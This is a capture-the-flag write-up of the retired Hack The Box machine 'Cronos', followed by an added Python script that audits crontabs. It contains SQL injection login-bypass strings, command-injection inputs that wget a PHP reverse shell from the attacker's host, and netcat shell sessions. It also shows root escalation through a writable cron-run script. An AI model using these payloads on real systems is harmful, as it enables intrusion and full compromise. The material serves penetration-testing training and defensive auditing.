Today we are going to solve another CTF challenge, “Cronos”, which is available online for those who want to improve their penetration testing skills. Cronos is a retired vulnerable lab from Hack The Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

$ nmap -T4 -A -sV 10.10.10.13

Starting Nmap 7.50 ( https://nmap.org ) at 2018-11-27 14:50 IST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (EdDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds

The box runs a DNS server (BIND on port 53), so it may answer for its own zone.
Add cronos.htb to /etc/hosts, then try a zone transfer (AXFR) with dig:

root@kali:/htb/cronos# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.11.5-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 33 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Nov 27 14:41:37 EST 2018
;; XFR size: 7 records (messages 1, bytes 203)

Visit http://admin.cronos.htb.

There is a SQL injection in the username field of the login form. Enter admin'-- (with a trailing space) in the username field, or alternatively ' or 1=1# in the username field.
The input field in welcome.php is vulnerable to command injection.

Create a php-reverse-shell payload and upload it to the server:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

root@kali:/htb/cronos# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.13 - - [27/Nov/2018 12:57:29] "GET /r2.txt HTTP/1.1" 200 -
In the input field of welcome.php enter:
8.8.8.8; pwd
8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/
8.8.8.8; cp r2.txt puckie.php

We upload the payload as a .txt file because a .php upload is not possible; hence we first fetch the .txt and then rename it to .php on the server.
Now start the first netcat listener and trigger the shell by browsing to http://admin.cronos.htb/puckie.php:

root@kali:~/Desktop# nc -lvp 9876
listening on [any] 9876 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 45074
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
21:15:46 up 1 day, 16:28, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@cronos:/$
Check /etc/crontab:
$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

The last entry runs, as root and every minute, the artisan script located in /var/www/laravel.
When we check the file’s permissions:

100755/rwxr-xr-x 1646 fil 2017-04-09 05:30:09 +0530 artisan

So we can replace this file with our payload:
Create a new payload and upload it to /var/www/laravel.
Rename it to artisan.
Make it executable with chmod +x artisan.
Put this second netcat listener in the background and wait for the new connection:

root@kali:~/Desktop# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.19] from cronos.htb [10.10.10.13] 37984
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 21:52:01 up 1 day, 17:04,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
#

Wait up to one minute, as the cron job runs every minute.
You will get root access.
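The misconfiguration exploited here, a root cron job executing a file that a low-privileged account controls, is easy to audit for. The following Python checker is an added example, not part of the write-up: it parses a system crontab and flags root-run jobs whose referenced files are owned by, or writable by, a non-root user. The crontab text is the one shown above; the file ownership (artisan owned by www-data, uid 33) is constructed metadata standing in for the target's filesystem.

```python
import os
import re
import stat
from typing import Callable, Dict, List, NamedTuple, Tuple

# Constructed sample: the relevant lines of the /etc/crontab shown in the write-up.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

class Finding(NamedTuple):
    user: str
    path: str
    reason: str

def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs from a system crontab (/etc/crontab, /etc/cron.d/*)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # skip blanks, comments and VAR=value lines
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs

ABS_PATH = re.compile(r"(?<![\w-])/[\w./-]+")  # absolute paths inside a command string

def audit(text: str, stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[Finding]:
    """Flag root jobs whose referenced regular files/directories a non-root user can change.
    stat_fn is injectable so the check can run against constructed metadata."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in ABS_PATH.findall(command):
            try:
                st = stat_fn(path)
            except FileNotFoundError:
                continue
            if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
                continue  # ignore devices such as /dev/null
            if st.st_uid != 0:
                findings.append(Finding(user, path, f"owned by uid {st.st_uid}, not root"))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(Finding(user, path, "group/world writable"))
    return findings

# Constructed filesystem metadata: path -> (mode, uid). artisan owned by www-data is an assumption.
FAKE_FS: Dict[str, Tuple[int, int]] = {
    "/etc/cron.hourly": (stat.S_IFDIR | 0o755, 0),
    "/var/www/laravel/artisan": (stat.S_IFREG | 0o755, 33),
    "/dev/null": (stat.S_IFCHR | 0o666, 0),
}

def fake_stat(path: str) -> os.stat_result:
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    mode, uid = FAKE_FS[path]
    return os.stat_result((mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))

def demo() -> List[Finding]:
    return audit(SAMPLE_CRONTAB, fake_stat)
```

Run `audit(open("/etc/crontab").read())` on a real host to use the default os.stat lookup; the only hit on the sample data is the artisan script, which is exactly the file the write-up replaces.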

Author: Jacco Straathof